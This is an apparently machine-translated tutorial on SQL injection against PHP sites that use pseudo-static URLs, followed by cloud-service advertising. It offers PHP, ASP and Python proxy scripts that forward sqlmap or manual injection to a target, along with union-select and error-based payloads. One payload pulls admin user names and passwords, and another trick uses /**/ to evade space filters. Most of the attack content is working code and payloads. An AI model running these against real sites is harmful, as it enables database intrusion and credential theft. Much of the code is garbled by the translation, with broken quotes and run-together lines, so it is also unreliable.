PHP Summary of pseudo-static injection [asp and Python-related code], python
This example describes PHP's pseudo-static injection. We will share this with you for your reference. The details are as follows:
I. Transit Injection Method
1. Through http://www.xxx.com/news.php? Id = 1 is done after pseudo-static.
Http://www.xxx.com/news.php/id/1.html
2. Test procedure:
Php code for intermediate injection: inject. php
<?phpset_time_limit(0);$id=$_GET["id"];$id=str_replace(” “,”%20″,$id);$id=str_replace(“=”,”%3D”,$id);//$url = "http://www.xxx.com/news.php/id/$id.html";$url = "http://www.xxx.com/news.php/id/$id.html";//echo $url;$ch = curl_init();curl_setopt($ch, CURLOPT_URL, "$url");curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);$output = curl_exec($ch);curl_close($ch);print_r($output);?>
3. Set up PHP in the local environment and access http: // 127.0.0.1/inject. php? Id = 1
You can run the injection vulnerability through sqlmap or havj.
Appendix ASP intermediate code:
<% JmdcwName = request ("id") JmStr = JmdcwNameJmStr = URLEncoding (JmStr) JMUrl = "http: // 192.168.235.7: 8808/ad/blog/"// actually requested URL JMUrl = JMUrl & JmStr &". html "// concatenate urlresponse. write JMUrl & JmStr // here I intentionally output the url to see 'jmref = "http: // 127.0.0.1/6 kbbs/bank. asp "JmCok =" "JmCok = replace (JmCok, chr (32)," % 20 ") JmStr = URLEncoding (JmStr) response. write PostData (JMUrl, JmStr, JmCok, JmRef) // url, query string, cookie, referer field Function PostData (PostUrl, PostStr, PostCok, PostRef) Dim HttpSet Http = Server. createObject ("msxml2.serverXMLHTTP") With Http. open "GET", PostUrl, False. send () PostData =. responseBodyEnd WithSet Http = NothingPostData = bytes2BSTR (PostData) End FunctionFunction bytes2BSTR (vIn) // process the returned information Dim when I, ThisCharCode, response = "" For I = 1 To LenB (vIn) thisCharCode = AscB (MidB (vIn, I, 1) If ThisCharCode <& H80 ThenstrReturn = strReturn & Chr (ThisCharCode) ElseNextCharCode = AscB (MidB (vIn, I + 1, 1) strReturn = strReturn & Chr (CLng (ThisCharCode) * & H100 + CInt (NextCharCode) I = I + 1End IfNextbytes2BSTR = strReturnEnd FunctionFunction URLEncoding (vstrin) // encode the parameter url before sending the package strReturn = "" Dim I 'vstrin = replace (vstrin, "%", "% 25") 'to add conversion search characters, 'vstrin = Replace (vstrin, chr (32), "% 20") 'converts spaces. If the website filters spaces, try/**/to Replace % 20' vstrin = Replace (vstrin, chr (43), "% 2B") 'JMDCW to add conversion + character vstrin = Replace (vstrin, chr (32), "/**/") 'adds the code to be filtered. // This is very important. For convenience, replace spaces /**/, for I = 1 To Len (vstrin) ThisChr = Mid (vstrin, I, 1) if Abs (Asc (ThisChr )) <& HFF ThenstrReturn = strReturn & ThisChrElseInnerCode = Asc (ThisChr) If InnerCode <0 ThenInnerCode = InnerCode + & hsf-end IfHight1 = (InnerCode And & HFF00) \ & HFFLow1 = InnerCode And & HFFstrReturn = strReturn & "%" & Hex (Hight1) & "%" & Hex (Low1) End ifNextURLEncoding = strReturnEnd Function %>
2. Manual Injection
1. http://www.xxx.com/play/Diablo.html
Http://www.xxx.com/down/html? 772. html
2. Test injection:
Http://www.xxx.com/down/html? 7722.16.html
Http://www.xxx.com/play/Diablo'.html
Http://www.xxx.com/play/diablo'/##/and
/**/1 = '1/*. html
Http://www.xxx.com/play/Diablo'
/**/And
/**/1 = '2/*. html
Http://www.xxx.com/page/html? 56'/**/and/**/1 = 1/*. html is normal.
Http://www.xxx.com/page/html? 56'/**/and/**/1 = 2/*. html Error
3. check whether there are differences on the page. If the difference is the same, there is no injection.
4. Joint query:
Http://www.xxx.com/play/diablo' and 1 = 2 union select 1, 2... Frominformation_schema.columns where 110000'1.html
Http://www.xxx.com/page/html? 56 '/**/and/**/(SELECT/**/1/**/from/**/(select/**/count (*), concat (floor (rand (0) * 2), (substring (select (version (), 1, 62 ))) a/**/from/**/information_schema.tables/**/group/**/by/**/a) B) = 1 /*. html
Manual injection method (2)
Http://www.xxx.net/news/html? 410. html
Http://www.xxx.net/news/html? 410 'Union/**/select/**/1/**/from/**/(select/**/count (*), concat (floor (rand (0) * 2), 0x3a, (select/**/concat (user, 0x3a, password) /**/from/**/pwn_base_admin/**/limit/**/0, 1), 0x3a) a/**/from/**/information_schema.tables/**/group/**/by/**/a) B/**/where'1'{'1.html
Note:
The pseudo-static injection is not the same as the normal GET injection of the URL.
. Common url get injection % 20, % 23, + and so on can be used; but pseudo static cannot, will be passed directly to the url, therefore, the '/**/' symbol is used to indicate spaces.
Iii. SQLmap Method
In sqlmap, if pseudo-static data exists, add *
Http://www.cunlide.com/id1/1/id2/2
Python sqlmap. py-u "http://www.xxx.com/id1/1#/id2/2 ″
Http://www.xxx.com/news/class? 103. htm
Python sqlmap. py-u http://www.xxx.com/news/class? 103 *. html"
Iv. python script method
Code:
from BaseHTTPServer import *import urllib2class MyHTTPHandler(BaseHTTPRequestHandler): def do_GET(self): path=self.path path=path[path.find('id=')+3:] proxy_support = urllib2.ProxyHandler({"http":"http://127.0.0.1:8087"}) opener = urllib2.build_opener(proxy_support) urllib2.install_opener(opener) url="http://www.xxx.com/magazine/imedia/gallery/dickinsons-last-dance/" try: response=urllib2.urlopen(url+path) html=response.read() except urllib2.URLError,e: html=e.read() self.wfile.write(html)server = HTTPServer(("", 8000), MyHTTPHandler)server.serve_forever()
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
